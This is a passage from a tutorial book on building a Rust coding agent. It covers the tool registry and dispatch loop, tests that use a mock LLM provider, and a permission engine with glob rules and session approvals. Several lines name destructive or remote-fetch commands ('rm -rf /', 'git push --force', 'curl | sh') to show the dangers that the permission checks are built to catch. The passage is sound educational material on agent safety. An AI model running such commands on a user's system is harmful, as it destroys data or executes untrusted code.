The ToolSet stores tools as Box<dyn Tool> -- a trait object that erases the concrete type. This means ReadTool, WriteTool, EditTool, and BashTool all become the same type behind a pointer, despite having different implementations. The HashMap<String, Box<dyn Tool>> is the collection that makes this work: it maps tool names to trait objects, so the agent can look up any tool by its string name at runtime.
This is dynamic dispatch. When the agent calls tool.call(args), the compiler does not know at compile time which call() method to invoke. It uses a vtable -- a function pointer table attached to the trait object -- to find the correct implementation at runtime. The cost is one pointer indirection per call, which is negligible compared to the I/O and network operations the tools perform.
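To make the mechanics concrete, here is a self-contained sketch of name-based dispatch through trait objects. The `Tool` trait here is a deliberately simplified, synchronous stand-in (the book's real trait is async and carries a `ToolDefinition`), and `EchoTool`/`UpperTool` are made-up examples:

```rust
use std::collections::HashMap;

// Simplified, synchronous stand-in for the book's Tool trait.
trait Tool {
    fn name(&self) -> &str;
    fn call(&self, args: &str) -> String;
}

struct EchoTool;
impl Tool for EchoTool {
    fn name(&self) -> &str { "echo" }
    fn call(&self, args: &str) -> String { format!("echo: {args}") }
}

struct UpperTool;
impl Tool for UpperTool {
    fn name(&self) -> &str { "upper" }
    fn call(&self, args: &str) -> String { args.to_uppercase() }
}

// Different concrete types become the same type behind Box<dyn Tool>.
fn registry() -> HashMap<String, Box<dyn Tool>> {
    let tools: Vec<Box<dyn Tool>> = vec![Box::new(EchoTool), Box::new(UpperTool)];
    tools.into_iter().map(|t| (t.name().to_string(), t)).collect()
}

fn dispatch(tools: &HashMap<String, Box<dyn Tool>>, name: &str, args: &str) -> String {
    match tools.get(name) {
        // Dynamic dispatch: the vtable picks the right call() at runtime.
        Some(tool) => tool.call(args),
        None => format!("error: unknown tool `{name}`"),
    }
}
```

The lookup-or-error shape is the whole registry idea; everything the real `ToolSet` adds is bookkeeping around it.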
Building a ToolSet
The ToolSet you defined in Chapter 4 is a HashMap<String, Box<dyn Tool>> with a builder API. Now we use it for real. Here is a helper function that assembles the standard tool set:
```rust
fn default_tools() -> ToolSet {
    ToolSet::new()
        .with(ReadTool::new())
        .with(WriteTool::new())
        .with(EditTool::new())
        .with(BashTool::new())
}
```
Four calls to .with(), one per tool. Each call constructs the tool, extracts its name from the ToolDefinition, and inserts it into the internal HashMap. The builder pattern means the order does not matter -- the tools are keyed by name, not position. (The AskTool requires an InputHandler, so it is registered separately when user input is needed.)
After construction, the ToolSet supports the operations the agent needs:
```rust
let tools = default_tools();

// Look up a tool by name (returns Option<&dyn Tool>)
let read = tools.get("read").unwrap();

// Get all schemas for the LLM
let defs: Vec<&ToolDefinition> = tools.definitions();
```
The definitions() method is what the SimpleAgent calls at the start of each loop iteration to tell the LLM which tools are available. Every definition includes the tool's name, description, and JSON Schema for its parameters. The LLM uses this information to decide when and how to call each tool.
The get() method is what the agent calls during tool dispatch -- the LLM says "name": "read", the agent does tools.get("read"), and calls the returned tool's .call() method with the provided arguments.
Tool categories (extension concept)
Not all tools are created equal. In the starter, the Tool trait is simplified
to just definition() and call(). But in a production agent, tools carry
metadata that classifies their behavior -- whether they are read-only,
concurrent-safe, or destructive. These flags drive the permission engine,
plan mode, and concurrent execution decisions.
Here is how the tools would be categorized:
Read-only tools: ReadTool (and GlobTool, GrepTool if added)
These tools observe the filesystem without changing it. Reading a file, listing paths by glob pattern, and searching content with regex -- none of these have side effects. They are safe to run in parallel and safe to run in a read-only plan mode.
Write tools: WriteTool, EditTool
Write and Edit modify files, so they are not read-only. They are not concurrent-safe because two writes to the same file would race. But they are not destructive either -- file writes are recoverable (you can revert with git).
Destructive tools: BashTool
The BashTool is the most dangerous. It can run arbitrary shell commands --
rm -rf /, git push --force, curl | sh. A production agent would mark it
as destructive, requiring explicit user approval.
Why these categories matter
In a production agent, categories compose into a permission hierarchy:
| Category | Plan mode | Auto-approve | Default mode |
|---|---|---|---|
| Read-only | Allowed | Allowed | Allowed |
| Write | Denied | Allowed | Ask user |
| Destructive | Denied | Ask user | Ask user |
The starter does not implement these categories yet -- that is an extension
topic for later chapters. For now, the SimpleAgent executes every tool call
the LLM requests without question.
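If you do add categories later, the table above is small enough to encode as a single `match`. The types below (`ToolCategory`, `Mode`, `Decision`) are hypothetical -- the starter defines none of them -- but the sketch shows how the hierarchy composes:

```rust
// Hypothetical types for illustration; the starter does not define these.
#[derive(Clone, Copy, PartialEq, Debug)]
enum ToolCategory { ReadOnly, Write, Destructive }

#[derive(Clone, Copy, PartialEq, Debug)]
enum Mode { Plan, AutoApprove, Default }

#[derive(Clone, Copy, PartialEq, Debug)]
enum Decision { Allowed, Denied, AskUser }

fn decide(category: ToolCategory, mode: Mode) -> Decision {
    match (category, mode) {
        // Read-only tools are always safe to run.
        (ToolCategory::ReadOnly, _) => Decision::Allowed,
        // Plan mode never mutates anything.
        (_, Mode::Plan) => Decision::Denied,
        // Writes are recoverable, so auto-approve covers them.
        (ToolCategory::Write, Mode::AutoApprove) => Decision::Allowed,
        // Everything else falls back to asking the user.
        _ => Decision::AskUser,
    }
}
```

The match arms read top to bottom like the table rows: the safest category short-circuits first, the most restrictive mode second, and the residual cases ask the user.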
Tool dispatch flow
Here is the complete flow from the LLM requesting a tool to the result being sent back:
flowchart TD
A["LLM responds with<br/>StopReason::ToolUse"] --> B["For each ToolCall"]
B --> C{"tools.get(name)?"}
C -->|Some| D["tool.call(args)"]
C -->|None| E["Return error:<br/>unknown tool"]
D --> F["Push ToolResult<br/>into message history"]
E --> F
F --> G["Call provider.chat()<br/>with updated history"]
G --> H{"StopReason?"}
H -->|ToolUse| B
H -->|Stop| I["Return final text"]
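The flowchart can also be simulated in a few lines. This is a hypothetical, synchronous miniature of the loop -- scripted turns stand in for the provider, plain function pointers stand in for tools -- not the starter's real API:

```rust
// Miniature of the dispatch loop: scripted provider turns, toy tools.
#[derive(Debug)]
enum Turn {
    ToolUse(Vec<(String, String)>), // (tool name, args)
    Done(String),                   // final text
}

fn run_loop(
    mut turns: Vec<Turn>,
    tools: &[(&str, fn(&str) -> String)],
    history: &mut Vec<String>,
) -> String {
    loop {
        match turns.remove(0) {
            // StopReason::Stop -> return the final text.
            Turn::Done(text) => return text,
            Turn::ToolUse(calls) => {
                for (name, args) in calls {
                    // tools.get(name)? -- Some => call, None => error string.
                    let result = match tools.iter().find(|(n, _)| *n == name.as_str()) {
                        Some((_, f)) => f(&args),
                        None => format!("error: unknown tool `{name}`"),
                    };
                    // Push the ToolResult into the history and loop again.
                    history.push(result);
                }
            }
        }
    }
}
```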
Wiring tools to the SimpleAgent
The SimpleAgent from the earlier chapters accepts tools through its builder API. You can add tools one at a time:
```rust
let agent = SimpleAgent::new(provider)
    .tool(ReadTool::new())
    .tool(WriteTool::new())
    .tool(EditTool::new())
    .tool(BashTool::new());
```
The .tool() method calls self.tools.push(t) internally, which extracts the tool's name from its definition and inserts it into the HashMap.
Once constructed, the agent handles the full dispatch pipeline. When the LLM responds with StopReason::ToolUse and a list of ToolCalls, the agent:
- Looks up each tool by name in the `ToolSet`
- Executes the tool with `call()`
- Packages the result as a `Message::ToolResult` and appends it to the conversation
If the LLM requests a tool that does not exist in the registry, the agent returns `` "error: unknown tool `foo`" ``. The model sees the error and can adjust.
Integration: write, read, respond
The test_multi_tool_write_and_read_flow test demonstrates a complete three-turn interaction with real tools. Let's trace through it step by step.
The setup creates a temp directory and scripts a MockProvider with three responses:
```rust
let dir = tempfile::tempdir().unwrap();
let path = dir.path().join("test.txt");
let path_str = path.to_str().unwrap().to_string();

let provider = MockProvider::new(VecDeque::from([
    // Turn 1: write a file
    AssistantTurn {
        text: None,
        tool_calls: vec![ToolCall {
            id: "c1".into(),
            name: "write".into(),
            arguments: json!({ "path": path_str, "content": "hello from agent" }),
        }],
        stop_reason: StopReason::ToolUse,
        usage: None,
    },
    // Turn 2: read it back
    AssistantTurn {
        text: None,
        tool_calls: vec![ToolCall {
            id: "c2".into(),
            name: "read".into(),
            arguments: json!({ "path": path_str }),
        }],
        stop_reason: StopReason::ToolUse,
        usage: None,
    },
    // Turn 3: final answer
    AssistantTurn {
        text: Some("Done! I wrote and read the file.".into()),
        tool_calls: vec![],
        stop_reason: StopReason::Stop,
        usage: None,
    },
]));
```
The agent is built with only the tools it needs:
```rust
let agent = SimpleAgent::new(provider)
    .tool(ReadTool::new())
    .tool(WriteTool::new());
```
Now trace the loop:
Turn 1 -- Write. The agent calls provider.chat(), gets back StopReason::ToolUse with a write tool call. It looks up "write" in the ToolSet, finds WriteTool, calls it with {"path": "/tmp/.../test.txt", "content": "hello from agent"}. The WriteTool creates the file on disk. The agent pushes the Message::Assistant(turn) and Message::ToolResult into the conversation history.
Message history after turn 1:
[User] "write and read a file"
[Assistant] tool_calls: [write(path, content)]
[ToolResult] "wrote /tmp/.../test.txt"
Turn 2 -- Read. The agent calls provider.chat() again with the updated history. The mock returns a read tool call. The agent looks up "read", calls ReadTool with {"path": "/tmp/.../test.txt"}. The ReadTool reads the file that WriteTool created in the previous turn and returns its content.
Message history after turn 2:
[User] "write and read a file"
[Assistant] tool_calls: [write(path, content)]
[ToolResult] "wrote /tmp/.../test.txt"
[Assistant] tool_calls: [read(path)]
[ToolResult] "hello from agent"
Turn 3 -- Final answer. The agent calls provider.chat() one more time. The mock returns StopReason::Stop with text. The agent pushes the final assistant message and returns the text to the caller.
The test verifies two things: the returned text contains "Done!", and the file actually exists on disk with the expected content. This confirms that real tools executed with real side effects inside the agent loop.
```rust
let result = agent.run("write and read a file").await.unwrap();
assert!(result.contains("Done!"));
assert_eq!(
    std::fs::read_to_string(&path).unwrap(),
    "hello from agent"
);
```
Error recovery: the hallucinated tool
The test_simple_agent_unknown_tool test demonstrates what happens when the LLM requests a tool that does not exist. This is not a hypothetical scenario -- models regularly hallucinate tool names, especially smaller models or when the tool list is long.
The mock provider scripts two responses:
```rust
let provider = MockProvider::new(VecDeque::from([
    // LLM hallucinates a tool
    AssistantTurn {
        text: None,
        tool_calls: vec![ToolCall {
            id: "c1".into(),
            name: "imaginary_tool".into(),
            arguments: json!({}),
        }],
        stop_reason: StopReason::ToolUse,
        usage: None,
    },
    // LLM recovers after seeing the error
    AssistantTurn {
        text: Some("Sorry, that tool doesn't exist.".into()),
        tool_calls: vec![],
        stop_reason: StopReason::Stop,
        usage: None,
    },
]));

let agent = SimpleAgent::new(provider).tool(ReadTool::new());
let result = agent.run("do something").await.unwrap();
assert!(result.contains("doesn't exist"));
```
Here is what happens:
Turn 1. The LLM asks to call "imaginary_tool". The agent does `tools.get("imaginary_tool")`, gets `None`, and returns `` "error: unknown tool `imaginary_tool`" ``. This error message is pushed into the conversation as a `Message::ToolResult`. The loop continues.
Turn 2. The LLM sees the error in the conversation history and produces a text response acknowledging the mistake. The agent returns normally.
The agent did not crash. It did not panic. It did not return an Err. It treated the unknown tool as a recoverable error and let the model recover. This is the correct behavior for a production agent. Models make mistakes. The agent should be resilient to them.
The same pattern handles other failure modes: a tool that returns an execution error or a tool that encounters an I/O failure. In every case, the model sees a descriptive error message and can adjust its approach.
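One way to realize that pattern, assuming (as the tests suggest) that the agent reports tool failures as strings rather than propagating `Err` -- the helper name here is illustrative, not from the starter:

```rust
// Sketch: fold a tool failure into a plain string the model can read,
// instead of propagating Err and killing the loop.
fn tool_result_text(outcome: Result<String, std::io::Error>) -> String {
    match outcome {
        Ok(output) => output,
        // A descriptive error string keeps the loop alive and lets
        // the model adjust its next call.
        Err(e) => format!("error: {e}"),
    }
}
```

Whatever the failure mode, the model only ever sees a `ToolResult` message; the error path and the success path are structurally identical from the loop's point of view.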
How Claude Code does it
Claude Code's tool registry is substantially larger, but the architecture is the same.
Scale. Claude Code registers 40+ tools spanning file operations, git, browser, notebooks, MCP (Model Context Protocol), and more. Each tool has permission metadata, cost hints, and rich terminal rendering. Our five tools (four core plus AskTool) cover the essential capabilities -- the same protocol, less surface area.
Dynamic registration. Our ToolSet is built at startup and never changes. Claude Code's registry is dynamic -- MCP tools are discovered and registered at runtime when a user configures an MCP server. A tool can appear or disappear mid-session. The ToolSet::push() method you built in Chapter 4 supports this pattern, though we do not exercise it yet.
Tool groups. Claude Code organizes tools into permission groups. File tools, git tools, and shell tools each have group-level allow/deny rules. Our flat ToolSet is simpler -- the permission engine (when implemented) would check per-tool metadata.
Usage statistics. Claude Code tracks how often each tool is called, how long each call takes, and how many tokens each result consumes. This data feeds into the TUI's status display and helps with cost estimation. Our book does not cover usage statistics, though the TokenUsage type from Chapter 4 gives you a starting point at the message level.
Despite these differences, the core protocol is identical. The LLM sees a list of tool schemas. It decides to call one. The agent looks up the tool by name, executes it, and feeds the result back. Everything else -- permissions, groups, statistics, dynamic registration -- is orchestration around that lookup.
Tests
Run the integration tests:
cargo test -p mini-claw-code-starter test_multi_tool_
Key tests:
- test_multi_tool_write_and_read_flow -- Agent writes a file then reads it back, verifying the file exists on disk with correct content.
- test_multi_tool_edit_flow -- Agent edits an existing file with string replacement and reads back the result.
- test_multi_tool_bash_then_report -- Agent runs a shell command and reports the output.
- test_multi_tool_write_edit_read_flow -- Full pipeline: write initial content, edit it, read it back. Confirms tools chain correctly.
- test_multi_tool_all_four_tools -- Agent uses bash, write, edit, and read in a single session, exercising the full tool set.
- test_multi_tool_multiple_writes -- Agent writes two separate files in sequence.
- test_multi_tool_read_multiple_files -- Agent reads two files in a single turn using parallel tool calls.
- test_multi_tool_five_step_conversation -- A five-step flow (bash, write, read, edit, read) verifying long multi-tool sessions.
- test_multi_tool_chat_basic -- Verifies the `chat()` method for simple text-only responses.
- test_multi_tool_chat_with_tool_call -- Verifies `chat()` with tool dispatch and message history growth.
- test_multi_tool_chat_multi_turn -- Two-turn conversation using `chat()` with accumulating message history.
Key takeaway
The tool registry is a HashMap lookup: the LLM produces a tool name, the agent finds the matching implementation, and calls it. This indirection -- name-based dispatch through trait objects -- is what lets you add or remove tools without changing the agent loop.
Recap
Part II is complete. Over four chapters you built every tool a basic coding agent needs:
- ReadTool reads files with line numbers, offsets, and limits.
- WriteTool creates and overwrites files, creating parent directories as needed.
- EditTool performs surgical string replacements within existing files.
- BashTool executes shell commands with timeout support and exit code reporting.
- GlobTool finds files by pattern matching across the directory tree.
- GrepTool searches file contents with regex, returning matches in `path:line_no: content` format.
In this chapter you wired them all together through the ToolSet registry and connected them to the SimpleAgent. The agent can now receive a user prompt, send it to the LLM with all tool schemas, execute whatever tools the model requests, and loop until the model produces a final answer. You have a working coding agent.
But a working agent is not a safe agent. Right now, the agent executes every tool call the LLM requests without question. If the model decides to bash("rm -rf /"), the agent runs it. If it writes over your source files with garbage, the agent writes. There are no guardrails, no confirmation prompts, no safety checks. The tool categories from this chapter (read-only, write, destructive) are still just a concept -- nothing in the starter defines or enforces them.
What's next
Part III -- Safety & Control -- adds the guardrails that turn a working agent into a trustworthy one:
- Chapter 13: Permission Engine -- The system that checks every tool call before execution. It evaluates permission rules, respects the permission mode, and asks the user when needed.
- Chapter 14: Safety Checks -- Static analysis of tool arguments. Catches dangerous patterns (`rm -rf`, `git push --force`) before the permission prompt even appears.
- Chapter 15: Hook System -- Pre-tool and post-tool hooks that run shell commands around tool execution. Lets users enforce custom policies (run linters after edits, block certain paths).
- Chapter 16: Plan Mode -- A restricted execution mode where only read-only tools run. The agent can analyze and plan but never modify. This is where `is_read_only()` finally gets enforced.
The tools you built in Part II are the hands. Part III teaches the agent when to use them -- and when not to.
Check yourself
← Chapter 11: Search Tools · Contents · Chapter 13: Permission Engine →
Chapter 13: Permission Engine
File(s) to edit:
`src/permissions.rs` · Test to run: `cargo test -p mini-claw-code-starter permissions` · Estimated time: 40 min
Your agent does whatever the LLM tells it to.
Think about that for a moment. In Chapters 1-12 you built a fully functional coding agent with several tools. The LLM can read files, write files, edit files, and execute arbitrary shell commands. The SimpleAgent dutifully dispatches every tool call the model requests. If the model says bash("rm -rf /"), the agent runs it. If it writes garbage over your source files, the agent writes. If it decides to curl | sh something from the internet, the agent curls. There is nothing between the LLM's request and the tool's execution.
This is fine for a tutorial. It is not fine for software you run on your actual codebase.
Chapter 13 changes that. We build the PermissionEngine -- the gatekeeper that evaluates every tool call before it executes. It sits between the SimpleAgent and the tools, and for each call it returns one of three answers: allow it silently, deny it, or ask the user for approval. The decision depends on configured rules, a default permission, and whether the user has already approved this tool during the session.
This is the first chapter of Part III: Safety & Control. By the end of it, your agent will no longer blindly obey the LLM. It will ask permission first.
cargo test -p mini-claw-code-starter permissions
Goal
- Implement `PermissionRule::matches()` using `glob::Pattern` so rules can match tool names with wildcards (e.g., `"mcp__*"` matches all MCP tools).
- Build the `PermissionEngine` with its three-stage evaluation pipeline: session approvals, then ordered rules, then default permission.
- Provide convenience constructors (`ask_by_default`, `allow_all`) for common configurations.
- Record session approvals so that once a user approves a tool, it stays approved for the rest of the session.
The problem: a spectrum of trust
Not every tool call is equally risky. Reading a file is harmless. Writing a file is recoverable (you can revert with git). Running rm -rf / is catastrophic. A good permission system should treat these differently.
At the same time, not every user wants the same level of control. Some users want to approve every action. Some want to approve only dangerous ones. Some are running automated pipelines and want no prompts at all. And some are in planning mode, where the agent should only observe, never modify.
This gives us two dimensions to work with:
- Tool risk level -- How dangerous is this tool?
- User trust level -- How much control does the user want? (The permission rules and default permission.)
The permission engine combines both dimensions into a single decision. Rules match tool names using glob patterns, and a default permission applies when no rule matches. This gives users fine-grained control over which tools require approval.
Permission types
The permission system introduces several new types in src/permissions.rs. Let's walk through each one.
Permission: the decision
```rust
#[derive(Debug, Clone, PartialEq)]
pub enum Permission {
    /// Tool call is allowed without asking.
    Allow,
    /// Tool call is blocked without asking.
    Deny,
    /// User must be prompted for approval.
    Ask,
}
```
Three variants, one for each possible outcome. Allow means execute immediately -- no prompt, no delay. Deny means block the call entirely -- the tool never runs. Ask means pause and show the user a prompt.
In the starter, Deny and Ask are unit variants with no string payload. The caller is responsible for providing context to the user or the model when a tool call is denied or needs approval.
PermissionRule: matching tool names
```rust
#[derive(Debug, Clone)]
pub struct PermissionRule {
    /// Glob pattern matching tool names (e.g. "bash", "write", "*").
    pub tool_pattern: String,
    /// The permission to assign when the pattern matches.
    pub permission: Permission,
}
```
Rules let users assign permissions to specific tools. A PermissionRule matches tool names with a glob pattern (using the glob::Pattern crate) and assigns a permission: always allow, always deny, or always ask.
For example, you might add a rule that allows write without prompting -- because you trust the model with file writes in this particular project. Or you might add a rule that denies bash entirely -- because this is a read-heavy analysis task and you want to prevent any command execution.
The matches() method uses glob::Pattern for matching:
```rust
impl PermissionRule {
    pub fn new(tool_pattern: impl Into<String>, permission: Permission) -> Self {
        Self {
            tool_pattern: tool_pattern.into(),
            permission,
        }
    }

    /// Check if this rule matches a tool name.
    /// Uses glob::Pattern for pattern matching, falling back to
    /// exact string comparison if the pattern is invalid.
    pub fn matches(&self, tool_name: &str) -> bool {
        // Your implementation: use glob::Pattern::new(&self.tool_pattern)
        unimplemented!()
    }
}
```
Rules take priority over the default permission. This is the key design principle: specific overrides beat general policies.
The PermissionEngine
With the types defined, we can build the engine itself. Open src/permissions.rs:
```rust
pub struct PermissionEngine {
    rules: Vec<PermissionRule>,
    default_permission: Permission,
    /// Session-level overrides (tool calls the user has already approved).
    session_allows: std::collections::HashSet<String>,
}
```
Three fields:
- `rules` -- An ordered list of permission rules. First match wins.
- `default_permission` -- The fallback permission when no rule matches. Typically `Permission::Ask` for interactive use or `Permission::Allow` for bypass mode.
- `session_allows` -- A set of tool names the user has approved during this session.
The constructors provide common configurations:
```rust
impl PermissionEngine {
    pub fn new(rules: Vec<PermissionRule>, default_permission: Permission) -> Self {
        // Your implementation: store rules, default_permission,
        // and an empty session_allows HashSet
        unimplemented!()
    }

    /// Create an engine that asks for everything by default.
    pub fn ask_by_default(rules: Vec<PermissionRule>) -> Self {
        Self::new(rules, Permission::Ask)
    }

    /// Create an engine that allows everything (no permission checks).
    pub fn allow_all() -> Self {
        Self::new(vec![], Permission::Allow)
    }
}
```
ask_by_default() is the standard interactive configuration -- every tool that is not covered by a rule prompts the user. allow_all() is the bypass mode -- no rules, no prompts. Session approvals start empty and accumulate as the user interacts with the agent.
The evaluate pipeline
The core of the engine is the evaluate method. It takes a tool name and the tool arguments, and returns a Permission. The pipeline has three stages, evaluated in order. The first stage that produces a definitive answer wins.
flowchart TD
A["evaluate(tool_name, args)"] --> B{"tool_name in<br/>session_allows?"}
B -->|Yes| C["Return Allow"]
B -->|No| D{"Any rule<br/>matches?"}
D -->|Yes| E["Return rule.permission"]
D -->|No| F["Return default_permission"]
```rust
pub fn evaluate(&self, tool_name: &str, _args: &Value) -> Permission {
    // Stage 1: session approvals
    if self.session_allows.contains(tool_name) {
        return Permission::Allow;
    }
    // Stage 2: rules in order (first match wins)
    for rule in &self.rules {
        if rule.matches(tool_name) {
            return rule.permission.clone();
        }
    }
    // Stage 3: default
    self.default_permission.clone()
}
```
Let's walk through each stage.
Stage 1: Session approvals
```rust
if self.session_allows.contains(tool_name) {
    return Permission::Allow;
}
```
If the user has already approved this tool during the current session, allow it immediately. Session approvals are recorded when the user says "yes" to an Ask prompt. Once approved, the tool runs without prompting for the rest of the session.
Session approvals are per-tool, not global. Approving write does not approve bash. This is deliberate -- the user should make a conscious choice for each tool they trust.
Stage 2: Permission rules
```rust
for rule in &self.rules {
    if rule.matches(tool_name) {
        return rule.permission.clone();
    }
}
```
If no session approval matched, we check the configured rules. Rules are evaluated in order -- the first rule whose matches() method returns true wins.
This is a critical design choice: first match wins. If you have two rules:
1. bash -> Deny
2. * -> Allow
Then bash hits rule 1 and is denied. Everything else hits rule 2 and is allowed. If the order were reversed, rule 2 would match everything first and rule 1 would never fire.
The matches() method uses glob::Pattern for matching, which gives you more expressive patterns than simple string comparison. "bash" matches only "bash". "*" matches everything. "file_*" matches "file_read", "file_write", etc.
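A dependency-free sketch of first-match-wins (the simplified `match_rule` here handles only exact names and the bare `"*"` wildcard; the real `matches()` uses `glob::Pattern` for full glob syntax):

```rust
// Simplified matcher: exact name or bare "*" only, to avoid the glob crate.
#[derive(Clone, Copy, PartialEq, Debug)]
enum Permission { Allow, Deny, Ask }

fn match_rule(pattern: &str, tool_name: &str) -> bool {
    pattern == "*" || pattern == tool_name
}

fn first_match(rules: &[(&str, Permission)], tool_name: &str) -> Permission {
    for (pattern, permission) in rules {
        if match_rule(pattern, tool_name) {
            return *permission; // first matching rule wins
        }
    }
    Permission::Ask // fall back to the default
}
```

Running the two-rule example from above through this sketch makes the ordering concrete: with `bash -> Deny` before `* -> Allow`, bash is denied and everything else allowed; reverse the rules and the wildcard shadows the deny entirely.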
Stage 3: Default permission
```rust
self.default_permission.clone()
```
If no session approval matched and no rule matched, fall back to the default permission set at construction time. For ask_by_default(), this is Permission::Ask. For allow_all(), this is Permission::Allow.
Key Rust concept: the glob::Pattern crate
The glob crate provides filesystem-style pattern matching. glob::Pattern::new("mcp__*") compiles a pattern, and .matches("mcp__fs__read") tests a string against it. The key operators are * (match any sequence of characters), ? (match any single character), and [abc] (match any character in the set). Unlike regex, glob patterns are intentionally simple -- they match whole strings, not substrings, and have no backtracking. This makes them fast and easy to reason about for tool name matching.
The Pattern::new() call returns a Result because the pattern string might be syntactically invalid (e.g., an unclosed bracket). The fallback to exact string comparison handles this edge case gracefully.
Pattern matching with glob
The PermissionRule::matches() method uses the glob crate for pattern matching:
pub fn matches(&self, tool_name: &str) -> bool {
    glob::Pattern::new(&self.tool_pattern)
        .map(|p| p.matches(tool_name))
        .unwrap_or(self.tool_pattern == tool_name)
}
Two cases:
- Valid glob pattern -- glob::Pattern::new() succeeds. The pattern is matched against the tool name using glob semantics: "*" matches everything, "file_*" matches "file_read", "file_write", etc., and "bash" matches only "bash".
- Invalid glob -- Falls back to exact string comparison. This is a safety net -- in practice, tool name patterns are simple and always valid.
Using glob::Pattern instead of hand-rolled matching gives us full glob semantics -- character classes ([abc]), alternatives, and proper wildcard handling -- with no custom code.
Session approvals
When evaluate returns Permission::Ask, the caller (typically the SimpleAgent or UI layer) prompts the user. If the user says yes, the caller records the approval:
pub fn record_session_allow(&mut self, tool_name: &str) {
    self.session_allows.insert(tool_name.to_string());
}
Subsequent calls to evaluate for the same tool will find it in the session_allows set (stage 1) and return Permission::Allow without prompting again.
The engine also provides convenience methods for checking permission outcomes:
pub fn is_allowed(&self, tool_name: &str, args: &Value) -> bool {
    matches!(self.evaluate(tool_name, args), Permission::Allow)
}

pub fn needs_approval(&self, tool_name: &str, args: &Value) -> bool {
    matches!(self.evaluate(tool_name, args), Permission::Ask)
}
Three properties of session approvals are worth emphasizing:
- Per-tool, not global. Approving write does not approve bash. Each tool is a separate trust decision.
- Session-scoped, not persistent. Approvals live in memory and vanish when the process exits. There is no file, no database, no persistence. If you restart the agent, you start with a clean slate.
- Above rules in priority. In the starter, session approvals are checked first (stage 1), so an approval overrides any rule. This is a deliberate simplification -- once the user says yes, the tool is approved for the session regardless of rules.
Putting it all together: a complete trace
Let's trace through a realistic scenario to see how the pipeline works end to end.
A user starts the agent with ask_by_default and one rule: write is always allowed.
let engine = PermissionEngine::ask_by_default(vec![
    PermissionRule::new("write", Permission::Allow),
]);
Now the LLM makes three tool calls in sequence. Here is what happens at each one:
Call 1: read("src/main.rs")
Stage 1: "read" not in session_allows. -> continue
Stage 2: Rule "write" does not match "read". No more rules. -> continue
Stage 3: Default permission is Ask. -> Ask
Result: Ask. The UI prompts the user. (Note: in the starter there are no is_read_only() flags on tools, so read tools go through the same pipeline as any other tool.)
Call 2: write("src/main.rs", ...)
Stage 1: "write" not in session_allows. -> continue
Stage 2: Rule "write" matches "write". Permission: Allow. -> Allow
Result: Allow. The write executes silently -- the rule overrides what the default permission would normally do (ask the user).
Call 3: bash("cargo test")
Stage 1: "bash" not in session_allows. -> continue
Stage 2: Rule "write" does not match "bash". No more rules. -> continue
Stage 3: Default permission is Ask. -> Ask
Result: Ask. The UI prompts the user. If the user approves, the caller calls engine.record_session_allow("bash"), and subsequent bash calls will be allowed via stage 1.
How the engine integrates with the SimpleAgent
The PermissionEngine is designed to be called from inside the SimpleAgent's tool execution flow. The integration point is conceptually simple:
For each tool call from the LLM:
1. Look up the tool in the ToolSet
2. Call permission_engine.evaluate(tool_name, args)
3. Match on the Permission:
- Allow -> execute the tool
- Deny -> return an error string to the LLM
- Ask -> prompt the user, then execute or deny
We will wire this up fully in later chapters. For now, the PermissionEngine is a standalone component with a clean interface: give it a tool name and arguments, get back a decision. This separation makes it testable in isolation -- which is exactly what this chapter's tests do.
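The three-way match in step 3 can be sketched as a small dispatch function. This is a simplified model: prompt_user is a made-up stub standing in for the real UI prompt, and tool execution is replaced by a string:

```rust
#[derive(Clone, Debug, PartialEq)]
enum Permission { Allow, Deny, Ask }

// Stand-in for prompting the user; a real UI would read from the terminal.
// The name and behavior are hypothetical, not part of the starter.
fn prompt_user(tool_name: &str) -> bool {
    tool_name != "bash" // pretend the user trusts everything except bash
}

fn dispatch(permission: Permission, tool_name: &str) -> Result<String, String> {
    match permission {
        // Allow -> execute the tool
        Permission::Allow => Ok(format!("executed {tool_name}")),
        // Deny -> return an error string to the LLM
        Permission::Deny => Err(format!("permission denied for {tool_name}")),
        // Ask -> prompt the user, then execute or deny
        Permission::Ask => {
            if prompt_user(tool_name) {
                Ok(format!("executed {tool_name}"))
            } else {
                Err(format!("user denied {tool_name}"))
            }
        }
    }
}

fn main() {
    assert!(dispatch(Permission::Allow, "read").is_ok());
    assert!(dispatch(Permission::Deny, "bash").is_err());
    assert!(dispatch(Permission::Ask, "write").is_ok()); // stub says yes
    assert!(dispatch(Permission::Ask, "bash").is_err()); // stub says no
}
```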
How Claude Code does it
Claude Code's permission system follows the same architecture but with more granularity.
Permission modes. Claude Code has the same core modes -- a default interactive mode, an auto-approve mode, and a plan mode. The mode is set via CLI flags (--dangerously-skip-permissions for bypass, --plan for plan mode) or interactively during the session.
Tool groups. Rather than individual tool flags, Claude Code organizes tools into permission groups. File tools, git tools, shell tools, and MCP tools each have group-level policies. A single rule can allow or deny an entire group. Our glob-based tool patterns achieve a similar effect with patterns like "file_*".
Per-path rules. Claude Code's rules can match not just tool names but also tool arguments -- specifically file paths. A rule like "allow write to src/**" permits writes within the source directory but blocks writes elsewhere. Our rules match only on tool names, which is simpler but less precise.
Session approvals. Claude Code's session approval system works the same way -- once the user approves a tool, it stays approved for the session. The approval is per-tool-name, stored in memory, and cleared on session reset.
Layered evaluation. The evaluation pipeline is the same: check session approvals, then match rules, then fall back to defaults. The ordering ensures that specific policies override general ones, just as in our implementation.
The core insight is the same in both systems: the permission engine is a function from (rules, session_state, default_permission) to Permission. It does not execute tools. It does not modify state (except session approvals). It just answers the question: should this tool call proceed?
Tests
Run the permission engine tests:
cargo test -p mini-claw-code-starter permissions
Key tests:
- test_permissions_allow_all -- allow_all() returns Allow for every tool, confirming bypass mode works.
- test_permissions_ask_by_default -- ask_by_default() with no rules returns Ask for any tool.
- test_permissions_rule_matching -- Three explicit rules for read, bash, and write return their respective permissions.
- test_permissions_glob_pattern -- A glob rule "mcp__*" matches "mcp__fs__read" but not "read".
- test_permissions_first_rule_wins -- Two rules for "bash" (Allow then Deny); first match wins, so Allow is returned.
- test_permissions_session_allow -- After record_session_allow("bash"), a tool that previously returned Ask now returns Allow.
- test_permissions_session_allow_per_tool -- Approving "read" does not approve "write" -- session approvals are per-tool.
- test_permissions_is_allowed / test_permissions_needs_approval -- Convenience methods correctly reflect the underlying evaluate() result.
- test_permissions_wildcard_rule -- A "*" rule overrides the default permission for all tools.
- test_permissions_deny_overrides_default -- A Deny rule for "dangerous" blocks it even when the default is Allow.
Key takeaway
The permission engine is a pure function from (tool_name, rules, session_state, default) to Permission. It does not execute tools or interact with the user -- it just answers the question "should this proceed?" This separation makes it trivially testable and reusable across different UI contexts.
Recap
In this chapter you built the PermissionEngine -- the gatekeeper between the LLM's requests and your tools. The key ideas:
